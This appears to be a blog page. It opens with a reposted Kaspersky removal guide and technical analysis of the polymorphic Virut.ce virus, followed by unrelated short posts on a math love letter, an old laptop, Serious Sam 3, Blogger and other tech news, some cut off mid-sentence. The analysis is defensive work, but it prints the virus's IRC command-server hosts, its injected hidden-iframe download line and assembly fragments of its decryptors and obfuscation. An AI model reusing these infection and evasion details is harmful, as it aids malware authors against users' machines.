How to disinfect a PC from Virus.Win32.Virut.ce, q

( Original article from kaspersky )
Main function of  Virus.Win32.Virut.ce, q is a botnet client which is used by the virus to transmit data from an infected PC. Here you can read more about botnets and their usage.

To disinfect a system infected with malware Virus.Win32.Virut.ce, q use the tool VirutKiller.exe. 




Disinfection of an infected system

The System restore function should be disabled before attempting to disinfect a system.

• Download the archive VirutKiller.zip and extract it into a folder on the infected (or potentially infected) PC using an archiver program (for example, WinZip).
  
• Run the file VirutKiller.exe.
  
• Wait for the scan and disinfection to finish. A reboot might require after disinfection.
  

If started without switches, the tool will:

• Seek and terminate malicious threads.
• Seek hooked functions and unhook them:
• NtCreateFile;
• NtCreateProcess;
• NtCreateProcessEx;
• NtOpenFile;
• NtQueryInformationProcess.
• Scan and disinfection of files on all hard disk drives.
• While scanning hard disk drives, the tool will also perform a check of executable files of all running processes every 10 seconds.
  Terminate detected infected processes and disinfect infected files.
  

Optional switches to run the tool from command prompt:

-l <file_name> - write log to the file.
-v - detailed logging (must be used in combination with the parameter -l).
-s ;- scan in “silent” mode (without opening console box).
-y - when the utility finishes, its window will be closed.
-p <folder_path> – scan a specific folder.
-r - scan removable drives (flash), external USB and FireWire hard disks.
-n - scan network drives.

Symptoms of infection:

• Infected computers keep trying to access the following addresses to receive administration commands:
• irc.zief.pl;
• proxim.ircgalaxy.pl.
  
• An experienced user can track hooks of the following functions in almost all processes (these hooks are used by the virus to infect all executable files a process is trying to access, and introduce its code into all newly started processes):
• NtCreateFile;
• NtCreateProcess;
• NtCreateProcessEx;
• NtOpenFile;
• NtQueryInformationProcess.

You might use the Rootkit Unhooker utility, for example:

Or Gmer:

Review of the Virus.Win32.Virut.ce Malware Sample

Introduction

This article is dedicated to the polymorphic virus known as Virus.Win32.Virut and to its ‘ce’ variant in particular. This article was originally written by Vyacheslav Zakorzhevsky

Why call it Virut.ce?

Virut.ce is one of the most widespread pieces of malware to be found on users’ computers. It infects executable files using the very latest techniques and that makes detecting and treating those files particularly difficult. The current means by which most malicious files are actively spread is server-side polymorphism. Infecting files is not as popular as it used to be about five years ago. This is largely because the level of file emulation has improved greatly. As such, you have to hand it to the authors of Virut.ce – they weren’t at all put off by the difficulties they faced in trying to infect executable files.

The technology implemented in Virut.ce accurately reflects the very latest methods used to write malware. Anti-emulation and anti-debugging tools are widely used, such as the tick count received when using multiple rdtsc instructions, series of GetTickCount API functions and the calling of multiple fake API functions.

Virut is the fastest-mutating virus known, with a new variant appearing as often as once a week. This indicates that its creators are closely monitoring antivirus databases so that they can take prompt action when a new Virut signature is released. As soon as this happens, the creators modify the virus so that once again it is undetectable. Interestingly, the malicious program ensures that its latest version is downloaded to compromised computers by taking advantage of infected HTML files as described below.

This article reviews the methods used to infect files. Obfuscation will also be covered as it is applied each time an executable file is infected. Additionally, the evolution of the virus’ components will be examined, from their emergence up until the present time. All of the statistics that appear in this article have been collected using Kaspersky Lab’s own Kaspersky Security Network (KSN) technology.

A brief review of statistics and propagation

The first Virut variant was called Virut.a and appeared back in mid-2006. From that moment on, the strain has evolved steadily, reaching Virut.q sometime in September 2007.

Virut.q was quite popular at the time, but only rarely occurs these days. Its developers discontinued ‘support’ for it during the second half of 2008, but then in the first week of February 2009, a new variant called Virut.ce appeared. It would seem that the creators of the virus spent the interim period perfecting new infection techniques, encryption algorithms and anti-emulation methods.

It should be pointed out here that any reference to the terms ‘Virut’, ‘the virus’ etc. that appear later in the article, refer to Virus.Win32.Virut.ce.

At present, the Virut.ce variant is the second most popular of all of the versions of Virus.Win32.*.* detected on users’ computers.

  
The Top 20 most frequently detected viruses January 2009 – May 2010

From the graph below it can clearly be seen that the propagation acitivity of Virut.ce increases with time.

  
Number of computers infected with Virut.ce May 2009 – May 2010

The virus propagates through infected files, both executable and HTML, or smaller programs designed to crack licensed software. Such programs generally include key generators (keygens) and direct file modification utilities (cracks). More specifically, Virut propagates as part of RAR/SFX archives with straightforward names like ‘codename_panzers_cold_war_key.exe’ or ‘advanced_archive_password_recovery_4.53_key.exe’. Such archives include a copy of Virut, either in its original form, or in an infected file alongside the desired program.

Virut’s functionality

Now let us look at the most important feature - Virut’s payload. It is common knowledge that most malware programs are exclusively designed for financial gain and Virut is certainly no exception. Effectively, it is a backdoor which first attempts to infiltrate the address space of the ‘explorer.exe’ process (‘services.exe’, ‘iexplore.exe’), then it connects to the irc.zief.pl and proxim.ircgalaxy.pl URLs via IRC-protocol and waits for commands to arrive. The procedure looks quite conventional, as does the list of processes the virus attempts to terminate as shown in the screenshot below. This list includes processes belonging to antivirus programs such as ‘nod32’, ‘rising’, ‘f-secure’ and a number of others.

  
Screenshot showing part of the decrypted static body of Virut.ce
and including the names of processes that are terminated by the virus

Interestingly, the virus infects all of the *.htm, *.php and *.asp files stored on the victim computer. To do so, it adds the following line to them: ‘<iframe src = http://jl.*****.pl/rc/ style = ‘display:none’></iframe>’. This downloads the latest version of Virut by exploiting a PDF-file vulnerability. This line may change from version to version within the ‘ce’ variant. For example, the letter ‘u’ may be substituted by ‘&#117’, which will not affect the browser in any way, but will prevent static signatures from working.

General discussion and method of infection

Virut.ce uses EPO technology or rewrites the entry point as an infection technique. One or two polymorphic decryptors are used in conjunction with it too.

The Entry Point Obscuring (EPO) technique works by preventing detection of the instruction to jump to the virus body. Typically, this is implemented by replacing a random instruction in the program’s original code or the parameter of the jump instruction. Below is an example of how an instruction and the jump address can be substituted.

  

The term ‘rewriting the entry point’ implies modifying the PE header of the file being infected, specifically rewriting the AddressOfEntryPoint field in the IMAGE_NT_HEADERS32 structure. Consequently file execution will start directly with the virus component.

As discussed earlier, the virus adds only one or two decryptors during infection – let us call them ‘Init’ and ’Main’. The Main decryptor is located in every file touched by Virut.ce, while the Init decryptor occurs only occasionally. Let us take a closer look at the function and general appearance of this decryptor.

The primary purpose of the Init decryptor is to decipher the first layer of the virus’ main body in order to hand over control to it. However, the bulk of the virus’ body remains encrypted even after this initial decryption has occurred. The Init decryptor is a small piece of code between 0x100 and 0x900 bytes long and contains many purposeless instructions that prevent static antivirus signatures from working. The decryptor is placed at the end of a section of code if there is a sufficient number of zeros. The decryptor works as follows:

1. It writes the size of the encrypted section to the register;
2. Performs a logical/arithmetic operation on the encrypted section with a constant key;
3. Increments/decrements the pointer to the encrypted section;
4. Jumps back to instruction 2 until everything is decrypted.

The main body of the virus is 0x4000 to 0x6000 bytes in size and is located at the end of the last section, which is extended specifically for this purpose and flagged as write/read-accessible and executable.

Thus, four ways for possible infection exist:

Init Decryptor + EPO:

  

Init Decryptor + modifications to the EP:

  

EPO only:

  

Rewriting the entry point only:

  

These four methods of contagion cover all the possible ways to infect a file or modify its structure.

Primary decryption of Virut.ce’s body

Before we go on to discuss the payload of the virus’ main body, let us look at the Init decryptor in a genuinely infected file.

  
Fragment of a file infected by Virus.Win32.Virut.ce which includes the Init decryptor

  
The disassembled code of the Init decryptor

The first of the screenshots above shows a fragment of an infected calc.exe file. The boundaries of the code section are marked and the Init decryptor is highlighted also. The second screenshot shows the disassembled code of the Init decryptor. The four logical elements discussed above are shown in red ovals.

In this example, the ECX register is filled with multiple push/pop instructions and decrypted with the adc instruction. However, this procedure has not always been the same. Virut.ce has evolved rapidly in the last year and so has the incorporated Init decryptor. If the virus body size written into the registry has been modified once (mov reg, dword changed to push dword; pop reg), the decryption procedure changes more than once (in date order):

1. ADD/SUB [mem], dword;
2. ROL/ROR [mem], byte;
3. ADC/SBB [mem], byte;
4. ADD/SUB [mem], byte;
5. ADD/SUB [mem], word;
6. ADC/SBB [mem], word;
7. ADC/SBB [mem], dword;

Now that we have reviewed the general schemes by which infection occurs and the primary processing of the virus’ main body, we can move on to reviewing the execution of the major part of Virut, which is always located at the end of the last section.

Restoring the original code

The code of the main body can be subdivided into three groups according to purpose: the restoration of the original function/entry point, the decryption of the static body and the execution of the payload.

Before we review each element, let us review the structure of the virus body and have a look at the associated part of the file.

 
The structure of the main body of Virut.ce

As can be seen in the picture, the main body added to the end of the code’s last section is made up of two types of components: the encrypted static body and the executable code. The executable part contains a code which performs anti-emulation, restores the original entry point and/or function and decrypts the static body. It is scattered over the main body and may be located at the top or bottom or be split in two. Interestingly, the executable part is also heavily obfuscated. This complicates detection as there are no static elements in the original file and a static element is obviously encrypted using different keys and/or algorithms, as will be demonstrated in the discussion below.

  
File fragment containing the main body of Virus.Win32.Virut.ce

The above picture shows a screenshot of a fragment of a file infected with Virus.Win32.Virut.ce. The executable part of the virus’ main body is highlighted with a red oval; it can also be identified visually as it contains a lot of zero bytes. In this instance, the virus has not used the Init decryptor during the infection process; otherwise, all of the sections would look similar and be encrypted.

Let us now look at the block dedicated to restoring the file’s original part. The logic of this block may be represented as follows:

1. CALL [address with a small increment];
2. Store the original contents of the registers;
3. Add the address pointing to kernel32.dll to the EBX register;
4. Calculate the pointer to the address of the instruction following CALL in item 1;
5. Perform an arithmetic/logical operation on the address obtained in instruction 4.

It should be noted that the virus uses the EPO technique only if it identifies an API-function being called from kernel32.dll. This function call may be identified by the calls through either the 0x15FF or 0xE8 opcodes, with a subsequent JMP instruction (0x25FF). If such a function is identified it is replaced with the JMP instruction (0xE9) which leads to instruction 1 in the previous diagram. Then the address of the replaced function from kernel32.dll is placed into the EBX register. If only the entry point has been modified, the value at [ESP + 24] is placed into the EBX register – this is the address for the application to return to kernel32.dll. Later on, the value stored in this register will be used to obtain the addresses of exported DLL functions. If the EPO technique is used, the value at [ESP + 20] will contain the address of the instruction following the call of the patched API-function; otherwise it will contain the address of the original entry point.

If obfuscation is excluded, the simplest way to restore the entry point and/or function will appear as follows (assume the GetModuleHandleA function was replaced):

CALL $ + 5
PUSHAD
MOV EBX, [GetModuleHandleA] 
XOR [ESP + 20h], Key

This code is completely in line with the general logic of the entire block. Now, let us see how all of these stages have changed over time. The only stage we will not dwell on is the second operation (save the original contents of the registers) as it is always implemented by the PUSHAD instruction.

Let us review each of the block’s logical elements in detail.

The first stage – the CALL instruction – has not changed much over time. Originally, it looked like CALL $ + 5, later CALL $ + 6(7,8), then CALL $ + 0xFFFFFFFx, which is a call ‘backwards’ . It may seem that this operation is of little importance and can be scrapped, but that is not true. This address is used to restore the entry point/original function as well as to address the decryption keys and the start of the static code. We will mention this address again when we discuss the Main decryptor.

Stage 3 is modified more often than stage 1 and may be implemented in several ways:

• MOV EBX, [ApiFunc]/MOV EBX, [ESP + 24h];
• PUSH [ApiFunc]/[ESP + 24h]; POP EBX;
• SUB ESP, xxh; PUSH [ESP + 24h + xx]; POP EBX;
• LEA EBX, [ESP + xxh]; MOV EBX, [EBX + 24h - xx];
• ADD ESP, 28h; XCHG [ESP – 4], EBX;

This list of examples is by no means exhaustive, but gives a general understanding of how this stage evolved with time. Additionally, intermediate manipulations of the ESP and EBX registers occur.

Let us review the last stage, which restores the address of the original entry point or the patched CALL instruction. This stage is modified every two or three weeks.

After the PUSHAD instruction is called, the ESP register – the indicator to the stack – will be decremented by 0x20 and so ESP + 20h will store a value supplied by the last CALL instruction. An arithmetic/logical operation is applied to this value and the required figure is obtained.

Below are some of the possible sequences of operation that perform the actions described above:

• XOR/AND/OR/ADD/SUB [ESP + 20h], const;
• MOV [ESP + 20h], const;
• LEA EBP, [ESP + x]; MOV/OR/ADD/SUB/XOR EBP, const; XCHG [EBX + 20h – x], EBP;
• MOV EBX, ESP; PUSH const; POP [EBX + 20h];
• PUSH const; POP [ESP + 20h].

Again, this list is not exhaustive, but gives an understanding of the overall trend. Various intermediate operations are added.

The screenshot below presents a fragment of an infected file which contains all of the operations described above highlighted in red ovals.

 
Screenshot of a file infected with Virus.Win32.Virut.ce,
containing a code to restore the original entry point

For clarity, the above code examples did not include obfuscation. However, obfuscation is used extensively in all of the file sections added by the virus, including the Init decryptor and the entire executable part of the main body. It is obfuscation that completely blocks static signatures from detecting the virus as it radically modifies the appearance of the code without changing its performance. Below are some examples of junk instructions which do not perform any meaningful operations and are only used to obfuscate the code:

XCHG reg1, reg2; XCHG reg2, reg1; (used together)
SUB reg1, reg2; ADD reg1, reg2; (used together) 
MOV reg, reg; OR reg, reg; AND reg, reg; XCHG reg, reg; LEA reg, [REG]; 
CLD, CLC, STC, CMC, etc.

‘reg1’ and ‘reg2’ stand for different registers; ‘reg’ stands for the same register within a single expression

Arithmetic/logical operations with an arbitrary second operand:

ADC reg, const; SBB reg, const; XOR reg, const; etc.

In the screenshots below, elements of obfuscation are highlighted in red ovals:

  
Screenshots containing code of the virus’ main body with obfuscation elements shown in ovals

The screenshot on the left shows very clearly that junk instructions make up some 70-80% of the entire code.

The examples above present some cases of obfuscation that occur most often and are not exhaustive. As the virus evolves, new obfuscation techniques evolve alongside it.

We have reviewed the first stage of execution of the virus’ main body. We will not dwell on the stages that implement various anti-emulation and anti-debugging techniques and move straight on to the Main decryptor.

Decrypting the main body

The execution of the decryption code starts after the virus completes its initial activities such as restoring the patched code, creating a specifically named object and obtaining the addresses of the functions to be used from system DLLs and anti-cycles.

If the Main decryptor is viewed in a disassembler, its code will appear utterly meaningless, as the RETN instruction is called which hands over control to a randomly chosen position. Before the main decryption process starts, the RETN instruction (0C3h) is replaced with CALL (0E8h). This is accomplished by an instruction which may typically look like this:

ADD/SUB/XOR [EBP + xx], bytereg

In the above, EBP points to the address of the instruction following CALL and bytereg is one of the byte registers.

We can therefore consider that the decryption cycle starts after RETN is changed to CALL. Next follows the decryption cycle which is just as obfuscated as the rest of the virus’ body is. Not only are a large number of algorithms used, but many of them are more complex than those used within the Init decryptor. Typically, between two to six logical/arithmetic operations are used in combination. In algorithms, the EDX register contains the decryption key and the EAX register contains the virtual address where the static body starts. The registers contain instructions which may look like this:

MOVZX/MOV dx/edx, [ebp + const] LEA eax, [ebp + const]

The EBP register contains the address which follows the CALL instruction; this address was mentioned earlier when we reviewed the first stage of the logical scheme which restores the original part of the file. The instructions performing these two operations have also been modified with time, but we will not discuss them here.

The algorithms in use are very diverse so we will only provide examples of the most interesting ones:

ROL DX, 4
XOR [EAX], DL
IMUL EDX, EDX, 13h

ADD [EAX], DL
ROL DX, 5
IMUL EDX, 13h

XOR [EAX], DH
ADD [EAX], DL
XCHG DH, DL
IMUL EDX, 1Fh

XOR [EAX], DH
XCHG DH, DL
ADD [EAX], DH
IMUL EDX, 1Fh

XOR [EAX], DL
ADD [EAX], DH
IMUL EDX, 2Bh
XCHG DH, DL

The instructions used changed from version to version, but no clear trend can be observed: relatively simple algorithms were replaced by more complex ones, which in turn were replaced by simpler ones again. It appears that the virus creator’s ultimate goal was to use an algorithm that could better resist possible brute force attempts. This may well account for the continuous changes to the algorithms, as well as the irrationality of those changes.

 
A disassembled fragment of the Main decryptor

The screenshot above contains a fragment of the Main decryptor’s disassembled code. The meaningful (non-junk) instructions discussed above are highlighted in red ovals. Some junk operations are also present here for obfuscation purposes.

To continue the discussion regarding the execution of the infected file, let us move on to the execution of the malicious payload contained within the decrypted static body. It typically starts with a CALL instruction to a nearby cell in order to calculate the virtual address of the beginning of the executable code and use it later on for addressing.

  
The virus’ decrypted static body

The screenshot above shows the virus’ decrypted static body. The lines highlighted by the red ovals carry specific parts of the malicious payload. For example, ‘JOIN’ and ‘NICK’ are IRC commands, ‘irc.zief.pl’ and ‘proxim.ircgalaxy.pl’ are remote IRC servers that Virut attempts to contact; ‘SYSTEM\CurrentControlSet\ Services\SharedAccess\ Parameters\FirewallPolicy\ StandardProfile\AuthorizedApplications\ List’ is the registry key containing the list of trustworthy programs for the Windows firewall.

Conclusion

Virut.ce is interesting for the variety of file infection mechanisms that it uses, as well as its polymorphism and obfuscation techniques. However, its malicious payload is quite commonplace. This version of Virut was the first to combine all of the aforementioned malicious techniques into a single piece of malware. Some malicious programs may be heavily obfuscated, others may employ a wide range of anti-emulation techniques, but Virut.ce combines all of these in one package. This article provides a detailed account of these malicious techniques.

The article is not an attempt at a complete description of Virut.ce, nor is it intended to be. We could have gone deeper into how the virus communicates with the IRC server, or examined more closely the details of how files are infected, but this time we deliberately dwelt on Virut’s basic mechanisms. Additionally, publishing a detailed description of the anti-emulation techniques would be irresponsible as malware writers could then exploit this information.

Assessing the virus’ future is quite a difficult task. As of April-May 2010, no new versions of Virut.ce have been detected; however, this does not mean that its evolution has stopped. It is quite possible that the virus writers have taken a break in order to develop further changes to the virus that could render it immune to current antivirus products.

Currently, all of Kaspersky Lab’s products are able to successfully detect and treat Virus.Win32.Virut.ce and as soon as a new variant is detected, its signature will be added to the Kaspersky Lab antivirus databases.

We hope that this article will be of assistance to virus analysts and those interested in the study of malware. These days, anti-emulation and anti-debugging techniques are commonly used in most malicious programs that propagate by means of server-side polymorphism. An awareness of the technologies implemented in Virus.ce helps to broaden our understanding of many other malicious programs, including polymorphic viruses employing similar methodologies.

A cute Mathematical Love Letter to Lover !!!

My Dear Love,

Yesterday, I was passing by your rectangular house in trigonometric lane. There I saw you with your cute circular face, conical nose and spherical eyes, standing in your Elliptical garden.

Before seeing you my heart was a null set, but when a vector of magnitude (likeness) from your eyes at a deviation of theta radians made a tangent to my heart, it got differentiated.

My love for you is a quadratic equation with real roots, which only you can solve by making good binary relation with me. The cosine of my love for you extends to infinity. I promise that I should not resolve you into partial functions but if I do so, you can integrate me by applying the limits from zero to infinity. You are as essential to me as an element of a set. The geometry of my life revolves around your acute personality.

My love, if you do not meet me at parabola restaurant on date 10 at sunset, when the sun is making an angle of 160 degrees, my heart would be like a solved polynomial of degree 10. With love from your higher order derivatives of maxima and minima, of an unknown function.

Yours ever loving, Pythagoras

De-Morgan's Law,
opposite to Guass house.
Binomial Avenue, MATHSCITY,
MATHEMATICA- 
PIN : αβγδ∞θ MOBILE: 1234567890 

World’s first laptop, 25 years old and still running!

I was born in 1985 and I wouldn’t lay my hands on a PC until 10 years later. In that same 1985 though, the first mass market consumer laptop was released by Toshiba and it was called the T1100. Now you may think that it was a piece of crap and to today’s standards it most certainly is but it can still have a sense of humor:

Ah, you can’t read German? It asks to “be patient, because it isn’t that young anymore”. The specs on this beauty?

256KB of RAM and a 4.77 MHz Intel Processor made your computing dreams come to life and just like the Macbook Air of today it didn’t have a regular Hard Drive. Instead it supported floppy disks and weighed in at a whopping 4.1 Kilograms. Pricing was set at $1899,- not bad if you ask me, it could have made me the coolest newborn around the block.

Serious Sam 3 Releases this Summer WOW !!

It was a First Person Shooter wrapped around the game engine to showcase the eye candy, but Serious Sam turned out to be a damn fine back-to-the-basics old school shooter. Since then it has spawned four sequels (including the HD versions) and old school shooter fans have clamored for a Serious Sam 3. Croteam is indeed releasing Serious Sam 3: BFE sometime in the summer this year.

Serious Sam 3: BFE will be a prequel to the original game and is set in 22nd century Egypt as you make a final stand against Mental's minions. As an icing on the cake, it features a staggering 16 player co-op mode. So you and fifteen other friends can spam the trigger finger and pump the scenery and the contents therein with lead by the metric tonnes.

The game will also incorporate a range of melee attacks. Most importantly, the Sirian Werebull and the infernal Headless kamikaze return in the new installment. So expect the summer to be punctuated with those damned kamikaze screams long after you have stopped playing the game. Just like old times.

No one really knows what BFE in the title means, but speculations are rife with many theories; some of which makes sense like Before First Encounter to hilariously candid ones like Budget FPS Entry. Croteam also bundled some great screencaps along with the press release, and with characters models this decent the game seems to be destined for awesomeness. Let's hope the high polygon models aren't at the cost of smooth framrates and hordes of enemies.

At any rate, the Serious Sam 3 has already made a very good first impression with what has to be the most kickass press release ever. That's why we're going to break tradition and let you sample the whole press release right here.


TIME AND PLACE ARE SUBJECTIVE - BOOM! That was the sound of Serious Sam 3: BFE news dropping. Croteam s Serious Sam 3: BFE is a glorious throwback to the golden age of first-person shooters where men were men, cover was for amateurs and pulling the trigger made things go boom. Serving as a prequel to the original indie sensation, Serious Sam: The First Encounter, Serious Sam 3: BFE takes place during the Earth s final struggle against Mental's invading legions of beasts and mercenaries. Set against the collapsing temples of an ancient civilization and the crumbling cities of 22nd century Egypt, Serious Sam 3: BFE is an exhilarating fusion of classic twitch shooters and modern gameplay features.

"Serious Sam 3 is about pure fun and unfiltered action," said Davor Hunski, chief creative officer of developer Croteam."We wanted to expand on everything gamers love about the series while adding some genuinely unique new features to really enhance the mayhem Serious Sam is known for."

Trademark features such as relentless hordes of spectacular enemies and expansive outdoor battlefields return in Serious Sam 3: BFE at full force. Other features include:

Frantic Arcade-Style Action - The calling card of the Serious Sam series, hold down the trigger and lay waste to a never-ending onslaught of attackers or face being overrun by Mental s savage beasts. No cover systems, no camping - it s just you and them. All of them.

Mental's Fearsome Legions - A new battalion of unforgettable minions including the rumbling Scrapjack and towering Khnum join the legendary Headless Kamikaze, Gnaar and Sirian Werebull. Your days of mowing down zombie Nazi space pirates are over.

Serious Melee Attacks - When an enemy slips by your wall of lead and pain, use one of the all-new innovative melee moves to drop an enemy right where they stand in the most violent way possible.

Pure Multiplayer Mayhem - Play through the full campaign mode with up to 16 players or drop the gauntlet and let the heavy ordinance fly in versus modes like Deathmatch and Beast Hunt. This is the next level of Serious Sam multiplayer and all hell is about to break loose.

"Holy crap, I am going to make a boatload of cash of this game," said Fork Parker, chief financial officer at Devolver Digital, the Serious Sam 3: BFE publisher. I mean that's what this is all about, right? If this thing comes out in the summer my wife is totally getting the tit job she s been asking for.

Serious Sam 3 will bring the boom to PC and game consoles this summer.

When asked for further comment, Fork replied, "Bam. Tit job".


About Croteam
Croteam are the creative force behind the massively successful Serious Sam series, which is recognized across the globe for its action-packed and entertaining game design and its powerful Serious Engine technology. Founded in Zagreb, Croatia in 1993, Croteam has grown to become one of the most successful and respected developers in Eastern Europe. More information about Croteam can be found online at www.croteam.com and twitter.com/croteam.

About Devolver Digital
Devolver Digital is a small, laser-focused production and publishing company based in Austin, Texas, (also with one very lonely desperado in London) from an unnamed group of industry veterans/outlaw refugees. Our Twitter handle is @DevolverDigital so hook it up.

How to Remove and Hide Blogger NavBar (Top Navigation Bar)

When browsing Blogger powered weblogs hosted on blogspot.com domain or custom domain, there is always a NavBar (Navigation Bar or Banner) that appears on top of the blog. The Blogger NavBar contains Search Blog textbox, Flag Blog to notify Blogger about objectionable contents on the blog, Next Blog link to visit another blog randomly, plus links to create a blog or sign in to Blogger.

No many visitors nor bloggers themselves may find it useful though. It’s possible to hide and remove the NavBar with a little CSS hack. The trick will not interfere or mess up with the custom layouts that webmaster has designed, and pretty safe and easy to implement. In fact, if you’re publishing the Blogger blog to own custom domain with FTP or SFTP, it’s possible to turn off NavBar.
Turn Off and Disable NavBar in Blog Published by FTP or SFTP

1. Login to Blogger.

What is AMOLED?

AMOLED means Active Matrix Organic light emitting diode

Active matrix (AM) OLED displays stack cathode, organic, and anode layers on top of another layer - or substrate - that contains circuitry. The pixels are defined by the deposition of the organic material in a

Facebook Expands @ Mention Tagging to Comments

Facebook users can now tag their friends, Pages, Groups, and Events in comments to news feed stories and wall posts to create linked mentions. This will help users carry on conversations with other commenters and allow them to easily reference different entities on Facebook.

In September 2009, users gained the ability to mention friends and other Facebook pages in their status updates and wall posts by typing an “@” symbol followed by the first letters of a name and then selecting from a drop-down menu.
Later Facebook began showing tag suggestions whenever a user capitalized a letter in an update or post, but later removed the feature since it interrupted users who weren’t actually trying to tag anything.
Now users can type an “@” symbol to initiate the tag drop-down menu in comments. Until this release, some users had taken to manually typing @[first name] without it properly linking in order to create unofficial mentions in comments.
When a user is tagged, they’ll receive an notification stating that a friend “mentioned you in a comment.”

The new comment mentions also create new opportunity for Pages. Admins can “Use Facebook as Page”

Downpour Is a BitTorrent Client Made for Media Centers

Mac/Linux: Most BitTorrent clients work just fine at grabbing and managing your downloads. Downpour is a highly customizable installation that works hand-in-hand with your chosen media center, automatically importing media and supporting your filing and renaming preferences.
It's not a click-and-go app, as the easiest installation requires having a Python implementation set up. But tinker with Downpour enough, and its specialist features will reward your investment. RSS monitoring, automatic unpacking and renaming schemes, a built-in media browser, and a clean, remote-access friendly interface, to start with. The planned features look pretty nice, too.
Downpour is a free download for any system that has Python and a command line up and running; that can include Windows through Cygwin, if you want the hassle. Hit the link to get installation instructions.

Downpour BitTorrent Client

Top Instant Messengers

Digsby (Windows)

The youngest application by far to make the Hive Five, Digsby has taken the world by storm since we first mentioned it in February. Boasting integration with all of your IM networks as well as your email and social networking (Facebook and MySpace included), Digsby is converting new users left and right with their simple but appealing formula: IM + Email + Social Networking = Digsby. Currently a Windows only app, Digsby's developers promise that Mac and Linux versions are in the oven—and that they're constantly squashing bugs from the still-young Windows version.